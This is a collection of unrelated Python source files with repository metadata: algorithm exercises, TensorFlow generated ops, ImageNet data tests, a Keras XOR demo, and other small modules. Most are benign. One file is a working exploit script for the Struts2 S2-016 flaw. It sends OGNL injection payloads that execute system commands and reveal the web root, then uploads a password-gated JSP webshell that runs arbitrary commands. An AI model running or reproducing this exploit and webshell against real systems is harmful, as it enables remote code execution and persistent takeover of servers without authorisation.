no_license
|
sweetrain096/rain-s_python
|
5ca2fe5e7f97a681b6e75e64264687a723be1976
|
eb285eb50eeebfaa2b4a4d7816314e2073faab00
|
refs/heads/master
| 2021-07-19T16:06:01.389283 | 2020-05-29T14:56:16 | 2020-05-29T14:56:16 | 162,240,216 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 442 |
py
|
import sys
sys.stdin = open("11403_input.txt")
def dfs(node):
global cnt
if cnt:
visited[node] = 1
cnt += 1
for i in range(n):
if graph[node][i] and not visited[i]:
dfs(i)
n = int(input())
graph = []
for i in range(n):
graph.append(list(map(int, input().split())))
for row in range(n):
visited = [0 for _ in range(n)]
cnt = 0
dfs(row)
print(' '. join(map(str, visited)))
|
[
"[email protected]"
] | |
aafa2d25bda177feee0ba3861452ed094d4d6d30
|
80760d4c8a6b2c45b4b529bdd98d33c9c5509438
|
/Practice/atcoder/ABC/055/src/c.py
|
581f1048d011740a10f93f59ac009b0225db5863
|
[] |
no_license
|
prrn-pg/Shojin
|
f1f46f8df932df0be90082b475ec02b52ddd882e
|
3a20f1122d8bf7d95d9ecd205a62fc36168953d2
|
refs/heads/master
| 2022-12-30T22:26:41.020473 | 2020-10-17T13:53:52 | 2020-10-17T13:53:52 | 93,830,182 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 254 |
py
|
# sはありったけ使うほうがいい(cから作るとコストがかかる)
# ありったけ = m//2
# 残ったcからsccを作るには4つ必要
n, m = map(int, input().split())
c = min(n, m // 2)
c += max(0, (m-2*n) // 4)
print(c)
|
[
"[email protected]"
] | |
7373d5b736b485909f5bd2f9492763ddb0046a15
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_connivance.py
|
4c54eff01815f5dbf6ca736af9a0c9732235da69
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 393 |
py
|
#calss header
class _CONNIVANCE():
def __init__(self,):
self.name = "CONNIVANCE"
self.definitions = [u'the act of conniving, especially by knowing that something bad is happening and allowing it to continue: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"[email protected]"
] | |
c9781bbdb2daf299479b46c56664e6961bb2de0e
|
a3d72c9d47a3711ff1a7213da25bacdcb3a7aa32
|
/stickerfinder/models/__init__.py
|
060f44f521a3886e9ed3f2fb27f318cbfea89f87
|
[
"MIT"
] |
permissive
|
crashcoredump/sticker-finder
|
225a46c586d1b2b8764cf325e296186cbece5edd
|
8158724ebc3e8346012d0ede05a75bb8f9f5f7eb
|
refs/heads/master
| 2020-08-26T23:28:56.991893 | 2019-10-23T22:34:58 | 2019-10-23T22:34:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 788 |
py
|
from stickerfinder.models.chat import Chat, chat_sticker_set # noqa
from stickerfinder.models.sticker import Sticker, sticker_tag # noqa
from stickerfinder.models.task import Task # noqa
from stickerfinder.models.sticker_set import StickerSet # noqa
from stickerfinder.models.tag import Tag # noqa
from stickerfinder.models.user import User # noqa
from stickerfinder.models.change import Change, change_added_tags, change_removed_tags # noqa
from stickerfinder.models.report import Report # noqa
from stickerfinder.models.inline_query import InlineQuery # noqa
from stickerfinder.models.inline_query_request import InlineQueryRequest # noqa
from stickerfinder.models.sticker_usages import StickerUsage # noqa
from stickerfinder.models.proposed_tags import ProposedTags # noqa
|
[
"[email protected]"
] | |
db0ceb7dc61955a38e418bdd38b7e2bbb30d7b57
|
c3b66b2f374722acda9747e8c0759ec7aed7e367
|
/flask/app/plugins/Struts2/S2_016.py
|
788428d7ee3f5c29ee61681f8c4b92562e011671
|
[] |
no_license
|
LubyRuffy/linbing
|
743965f6e658e476da011ae3a91a91c8466ff977
|
b9fb2358955f19629b96ae753cd8811e8d89a862
|
refs/heads/master
| 2021-02-19T18:24:32.890527 | 2020-03-04T06:18:46 | 2020-03-04T06:18:46 | 245,317,758 | 1 | 0 | null | 2020-03-06T03:02:42 | 2020-03-06T03:02:41 | null |
UTF-8
|
Python
| false | false | 6,166 |
py
|
#!/usr/bin/env python3
'''
name: Struts2 S2-016漏洞,又名CVE-2013-2251漏洞
description: Struts2 S2-016漏洞可执行任意命令
'''
import os
import re
import json
import time
import urllib
import string
import random
import requests
from urllib import request, parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class S2_016_BaseVerify:
def __init__(self, url):
self.url = url
self.capta=''
words=''.join((string.ascii_letters,string.digits))
for i in range(8):
self.capta = self.capta + random.choice(words)
self.headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3",
'Content-Type': "application/x-www-form-urlencoded",
'Connection': "keep-alive",
}
self.check_payload = '''?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27''' + 'echo' + ' ' + self.capta + '''%27%29.getInputStream%28%29%29%7D'''
self.cmd_payload = '''?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{'whoami'}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}'''
self.path_payload = '''?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28"%2F"%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'''
self.jsp_payload = """
<%
if("cmd".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
"""
def get_pagecode(self, url):
req = requests.get(url = url, verify = False)
return req
def upload_jspshell(self, url, path):
webshellpath = "'" + path + '/' + "/test.jsp" + "'"
Headers = {'ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent' : 'Mozilla/5.0 (compatible; Indy Library)'}
payload = "?redirect:${%23path%3d"
payload += webshellpath
payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
payload += '"' + path + '/test.jsp' + '+Get Shell!!!"'
payload += "),%23stm.getWriter().flush(),%23stm.getWriter().close()}"
url += payload
try:
req = requests.post(url, data = self.jsp_payload, headers = Headers, timeout = 10, allow_redirects = False, verify = False)
if req.text.find('<html') == -1:
print('上传webshell文件成功,webshell文件路径为:', self.url.split('/')[0] + '//' + self.url.split('/')[2] + '/test.jsp')
else:
return 'Fail.....>_<'
except Exception as e:
return str(e)
def filter(self, check_str):
temp = ''
for i in check_str:
if i != '\n' and i != '\x00':
temp = temp + i
return temp
def run(self):
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
if '.action' not in self.url:
self.url = self.url + '/index.action'
check_req = self.get_pagecode(self.url + self.check_payload)
check_str = self.filter(list(check_req.text))
try:
if self.capta in check_str:
cmd_req = self.get_pagecode(self.url + self.cmd_payload)
cmd_str = self.filter(list(cmd_req.text))
print('存在S2-016漏洞,执行whoami命令成功,执行结果为:', cmd_str)
path_req = self.get_pagecode(self.url + self.path_payload)
if path_req.status_code == 200:
print('存在S2-016漏洞,获取网站文件路径成功,结果为:', path_req.text)
self.upload_jspshell(self.url, "".join(path_req.text.split()))
return True
else:
print('不存在S2-016漏洞!')
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
s2_016 = S2_016_BaseVerify('http://192.168.30.242:8080')
s2_016.run()
|
[
"[email protected]"
] | |
2e55ea81485a99cd8a994f57353debe1ccb6c9d8
|
dd65b9bc9475a6cc58817fd45c078e5a6abae241
|
/Tensorflow/car/web-tf2/gcf-packs/tensorflow2.0/source/tensorflow/python/ops/gen_clustering_ops.py
|
c6eae8834fad9b885a2742b697d32016a0d07dd6
|
[] |
no_license
|
jumbokh/gcp_class
|
5b68192ab4ad091362d89ad667c64443b3b095bb
|
0a8e2663bfb5b01ce20146da178fa0c9bd7c6625
|
refs/heads/master
| 2021-10-22T09:22:04.634899 | 2021-10-21T12:46:10 | 2021-10-21T12:46:10 | 228,617,096 | 8 | 7 | null | 2021-08-25T15:55:30 | 2019-12-17T12:58:17 |
Python
|
UTF-8
|
Python
| false | false | 13,575 |
py
|
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: clustering_ops.cc
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.tf_export import kwarg_only as _kwarg_only
from tensorflow.tools.docs import doc_controls as _doc_controls
def kmc2_chain_initialization(distances, seed, name=None):
r"""Returns the index of a data point that should be added to the seed set.
Entries in distances are assumed to be squared distances of candidate points to
the already sampled centers in the seed set. The op constructs one Markov chain
of the k-MC^2 algorithm and returns the index of one candidate point to be added
as an additional cluster center.
Args:
distances: A `Tensor` of type `float32`.
Vector with squared distances to the closest previously sampled cluster center
for each candidate point.
seed: A `Tensor` of type `int64`.
Scalar. Seed for initializing the random number generator.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"KMC2ChainInitialization", name, _ctx._post_execution_callbacks,
distances, seed)
return _result
except _core._FallbackException:
try:
return kmc2_chain_initialization_eager_fallback(
distances, seed, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"KMC2ChainInitialization", distances=distances, seed=seed, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"KMC2ChainInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
@_doc_controls.do_not_generate_docs
@_kwarg_only
def KMC2ChainInitialization(distances, seed):
return kmc2_chain_initialization(distances=distances, seed=seed)
tf_export("raw_ops.KMC2ChainInitialization")(KMC2ChainInitialization)
def kmc2_chain_initialization_eager_fallback(distances, seed, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function kmc2_chain_initialization
"""
_ctx = ctx if ctx else _context.context()
distances = _ops.convert_to_tensor(distances, _dtypes.float32)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
_inputs_flat = [distances, seed]
_attrs = None
_result = _execute.execute(b"KMC2ChainInitialization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"KMC2ChainInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def kmeans_plus_plus_initialization(points, num_to_sample, seed, num_retries_per_sample, name=None):
r"""Selects num_to_sample rows of input using the KMeans++ criterion.
Rows of points are assumed to be input points. One row is selected at random.
Subsequent rows are sampled with probability proportional to the squared L2
distance from the nearest row selected thus far till num_to_sample rows have
been sampled.
Args:
points: A `Tensor` of type `float32`.
Matrix of shape (n, d). Rows are assumed to be input points.
num_to_sample: A `Tensor` of type `int64`.
Scalar. The number of rows to sample. This value must not be larger than n.
seed: A `Tensor` of type `int64`.
Scalar. Seed for initializing the random number generator.
num_retries_per_sample: A `Tensor` of type `int64`.
Scalar. For each row that is sampled, this parameter
specifies the number of additional points to draw from the current
distribution before selecting the best. If a negative value is specified, a
heuristic is used to sample O(log(num_to_sample)) additional points.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"KmeansPlusPlusInitialization", name, _ctx._post_execution_callbacks,
points, num_to_sample, seed, num_retries_per_sample)
return _result
except _core._FallbackException:
try:
return kmeans_plus_plus_initialization_eager_fallback(
points, num_to_sample, seed, num_retries_per_sample, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"KmeansPlusPlusInitialization", points=points,
num_to_sample=num_to_sample,
seed=seed,
num_retries_per_sample=num_retries_per_sample,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"KmeansPlusPlusInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
@_doc_controls.do_not_generate_docs
@_kwarg_only
def KmeansPlusPlusInitialization(points, num_to_sample, seed, num_retries_per_sample):
return kmeans_plus_plus_initialization(points=points, num_to_sample=num_to_sample, seed=seed, num_retries_per_sample=num_retries_per_sample)
tf_export("raw_ops.KmeansPlusPlusInitialization")(KmeansPlusPlusInitialization)
def kmeans_plus_plus_initialization_eager_fallback(points, num_to_sample, seed, num_retries_per_sample, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function kmeans_plus_plus_initialization
"""
_ctx = ctx if ctx else _context.context()
points = _ops.convert_to_tensor(points, _dtypes.float32)
num_to_sample = _ops.convert_to_tensor(num_to_sample, _dtypes.int64)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
num_retries_per_sample = _ops.convert_to_tensor(num_retries_per_sample, _dtypes.int64)
_inputs_flat = [points, num_to_sample, seed, num_retries_per_sample]
_attrs = None
_result = _execute.execute(b"KmeansPlusPlusInitialization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"KmeansPlusPlusInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_nearest_neighbors_outputs = ["nearest_center_indices",
"nearest_center_distances"]
_NearestNeighborsOutput = _collections.namedtuple(
"NearestNeighbors", _nearest_neighbors_outputs)
def nearest_neighbors(points, centers, k, name=None):
r"""Selects the k nearest centers for each point.
Rows of points are assumed to be input points. Rows of centers are assumed to be
the list of candidate centers. For each point, the k centers that have least L2
distance to it are computed.
Args:
points: A `Tensor` of type `float32`.
Matrix of shape (n, d). Rows are assumed to be input points.
centers: A `Tensor` of type `float32`.
Matrix of shape (m, d). Rows are assumed to be centers.
k: A `Tensor` of type `int64`.
Number of nearest centers to return for each point. If k is larger than m, then
only m centers are returned.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (nearest_center_indices, nearest_center_distances).
nearest_center_indices: A `Tensor` of type `int64`.
nearest_center_distances: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"NearestNeighbors", name, _ctx._post_execution_callbacks, points,
centers, k)
_result = _NearestNeighborsOutput._make(_result)
return _result
except _core._FallbackException:
try:
return nearest_neighbors_eager_fallback(
points, centers, k, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"NearestNeighbors", points=points, centers=centers, k=k, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"NearestNeighbors", _inputs_flat, _attrs, _result, name)
_result = _NearestNeighborsOutput._make(_result)
return _result
@_doc_controls.do_not_generate_docs
@_kwarg_only
def NearestNeighbors(points, centers, k):
return nearest_neighbors(points=points, centers=centers, k=k)
tf_export("raw_ops.NearestNeighbors")(NearestNeighbors)
def nearest_neighbors_eager_fallback(points, centers, k, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function nearest_neighbors
"""
_ctx = ctx if ctx else _context.context()
points = _ops.convert_to_tensor(points, _dtypes.float32)
centers = _ops.convert_to_tensor(centers, _dtypes.float32)
k = _ops.convert_to_tensor(k, _dtypes.int64)
_inputs_flat = [points, centers, k]
_attrs = None
_result = _execute.execute(b"NearestNeighbors", 2, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"NearestNeighbors", _inputs_flat, _attrs, _result, name)
_result = _NearestNeighborsOutput._make(_result)
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "KMC2ChainInitialization"
# input_arg {
# name: "distances"
# type: DT_FLOAT
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# output_arg {
# name: "index"
# type: DT_INT64
# }
# }
# op {
# name: "KmeansPlusPlusInitialization"
# input_arg {
# name: "points"
# type: DT_FLOAT
# }
# input_arg {
# name: "num_to_sample"
# type: DT_INT64
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# input_arg {
# name: "num_retries_per_sample"
# type: DT_INT64
# }
# output_arg {
# name: "samples"
# type: DT_FLOAT
# }
# }
# op {
# name: "NearestNeighbors"
# input_arg {
# name: "points"
# type: DT_FLOAT
# }
# input_arg {
# name: "centers"
# type: DT_FLOAT
# }
# input_arg {
# name: "k"
# type: DT_INT64
# }
# output_arg {
# name: "nearest_center_indices"
# type: DT_INT64
# }
# output_arg {
# name: "nearest_center_distances"
# type: DT_FLOAT
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n=\n\027KMC2ChainInitialization\022\r\n\tdistances\030\001\022\010\n\004seed\030\t\032\t\n\005index\030\t\np\n\034KmeansPlusPlusInitialization\022\n\n\006points\030\001\022\021\n\rnum_to_sample\030\t\022\010\n\004seed\030\t\022\032\n\026num_retries_per_sample\030\t\032\013\n\007samples\030\001\nl\n\020NearestNeighbors\022\n\n\006points\030\001\022\013\n\007centers\030\001\022\005\n\001k\030\t\032\032\n\026nearest_center_indices\030\t\032\034\n\030nearest_center_distances\030\001")
|
[
"[email protected]"
] | |
6b2320e8c2c47715ea5c98b27735c8f33d211d9e
|
369e260e100db9ab5cc8b1711e99ef5e49aec173
|
/ml/m04_xor4_keras.py
|
87fe064f010eff90ddc713569ba5716aa45af154
|
[] |
no_license
|
HWALIMLEE/study
|
7aa4c22cb9d7f7838634d984df96eed75f7aefea
|
8336adc8999126258fe328d6b985a48e32667852
|
refs/heads/master
| 2023-03-26T09:11:19.606085 | 2021-03-29T23:03:04 | 2021-03-29T23:03:04 | 259,555,730 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,983 |
py
|
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from keras.layers import Dense
from keras. models import Sequential
import numpy as np
#머신러닝에서는 그냥 하면 되는데
#딥러닝은 np.array로 변경
#딥러닝은 가중치의 곱의 합
#행렬 곱, 행렬 연산 잘하기 위해
#list는 appending될 뿐-->연산 자체가 안 이루어진다.
#머신러닝은 가중치 연산이 아니다. 따라서 리스트도 가능하다
#labelencoder
#1.데이터
x_data=[[0,0],[1,0],[0,1],[1,1]]
y_data=[0,1,1,0]
x_data=np.array(x_data)
print(x_data)
y_data=np.array(y_data)
print("x_data.shape",x_data.shape) #(4,2)
print("y_data.shape:",y_data.shape) #(4,)
#2.모델
# model=LinearSVC()
# model=SVC()
# lin = LinearSVC()
# sv = SVC()
# kn = KNeighborsClassifier(n_neighbors=1)
model=Sequential()
#n_neighbors 작을수록 더 치밀
#데이터가 적을수록 n_neighbors 적게 하는 것이 좋다
#각 개체를 한개씩만 연결하겠다
model.add(Dense(10,input_dim=2,activation='relu')) #input과 아웃풋 #딥러닝 아님
model.add(Dense(30,activation='relu'))
model.add(Dense(20,activation='relu'))
model.add(Dense(10,activation='relu'))
model.add(Dense(1,activation='sigmoid')) #마지막에만 시그모이드
#output dimension=1
#3.실행
model.compile(optimizer='adam',metrics=['acc'],loss='binary_crossentropy') #metrics는 결과만 보는 것
model.fit(x_data,y_data,epochs=100,batch_size=1)
loss,acc=model.evaluate(x_data,y_data)
#accuracy는 1이 나올 수 없다, 선형으로는 절대 나올 수 없쥐
#4.평가예측
x_test = [[0,0],[1,0],[0,1],[1,1]]
x_test=np.array(x_test)
y_predict = model.predict(x_test)
# acc=accuracy_score([0,1,1,0],y_predict)
#그냥 score는 evaluate와 동일한 것
#evaluate대신 score사용
# acc2=accuracy_score([0,1,1,0],y_predict)
print(x_test,"의 예측 결과:",y_predict)
print("acc=",acc)
|
[
"[email protected]"
] | |
c3e30f6134e4652db4fcb9a756938a84de9592d2
|
3a85089c2498ff04d1b9bce17a4b8bf6cf2380c9
|
/TrackPropagation/SteppingHelixPropagator/python/__init__.py
|
e9c699776f8f1dbd5ebfdd70d185bf5b183ab392
|
[] |
no_license
|
sextonkennedy/cmssw-ib
|
c2e85b5ffa1269505597025e55db4ffee896a6c3
|
e04f4c26752e0775bd3cffd3a936b288ee7b0268
|
HEAD
| 2016-09-01T20:09:33.163593 | 2013-04-26T12:05:17 | 2013-04-29T16:40:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 232 |
py
|
#Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/TrackPropagation/SteppingHelixPropagator/',1)[0])+'/cfipython/slc6_amd64_gcc480/TrackPropagation/SteppingHelixPropagator')
|
[
"[email protected]"
] | |
ff0a7531475d07eb5161d4785ee3ed33b3de3b33
|
165e706d485e90f4e4f63cfb9f2c35acda14cfc0
|
/uq_benchmark_2019/imagenet/data_lib_test.py
|
b3ae4f7ae9236b62494d913b373efd1af733d1ab
|
[
"Apache-2.0"
] |
permissive
|
Tarkiyah/googleResearch
|
65581f3bbbe2ffe248c9e613c0ea7eac336d5372
|
dea327aa9e7ef7f7bca5a6c225dbdca1077a06e9
|
refs/heads/master
| 2022-12-07T12:04:44.153221 | 2019-11-21T16:03:48 | 2019-11-21T16:18:28 | 223,229,888 | 11 | 2 |
Apache-2.0
| 2022-11-21T21:39:10 | 2019-11-21T17:38:31 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 4,751 |
py
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for imagenet.data_lib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import tensorflow.compat.v2 as tf
from uq_benchmark_2019 import image_data_utils
from uq_benchmark_2019.imagenet import data_lib
flags.DEFINE_bool('fake_data', True, 'Bypass tests that rely on real data and '
'use dummy random data for the remaining tests.')
tf.enable_v2_behavior()
BATCH_SIZE = 8
BATCHED_IMAGES_SHAPE = (BATCH_SIZE,) + data_lib.IMAGENET_SHAPE
class DataLibTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters(['train', 'test', 'valid'])
def test_fake_data(self, split):
# config is ignored for fake data
config = image_data_utils.DataConfig(split)
dataset = data_lib.build_dataset(config, BATCH_SIZE, fake_data=True)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_uncorrupted_data(self, split):
config = image_data_utils.DataConfig(split)
if not flags.FLAGS.fake_data:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_roll_pixels(self, split):
config = image_data_utils.DataConfig(split, roll_pixels=5)
if not flags.FLAGS.fake_data:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_static_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_static=True, corruption_level=3,
corruption_type='pixelate')
if split in ['train', 'valid']:
with self.assertRaises(ValueError):
data_lib.build_dataset(config, BATCH_SIZE)
else:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_array_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_level=4, corruption_type='glass_blur')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_value_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_value=.25, corruption_type='brightness')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
def test_alt_dataset(self):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig('test', alt_dataset_name='celeb_a')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
if __name__ == '__main__':
absltest.main()
|
[
"[email protected]"
] | |
0413508e37f8a9575fd78da43bf93d2e9f9765ab
|
ddab7a88b96e782430656a1292c2575c58ef3b39
|
/cfehome/cfehome/urls.py
|
12c72b540be6c60c2a23b70ae80c16f85fc6db21
|
[] |
no_license
|
HenryTruth/rapidapi
|
11d5d407f294ac0f5305c181dea7a816b8efe7b5
|
4984641e7ec284df73b8b04f74e3b9b47360c85b
|
refs/heads/master
| 2023-03-18T07:32:49.063393 | 2021-02-28T16:38:08 | 2021-02-28T16:38:08 | 343,411,202 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 840 |
py
|
"""cfehome URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
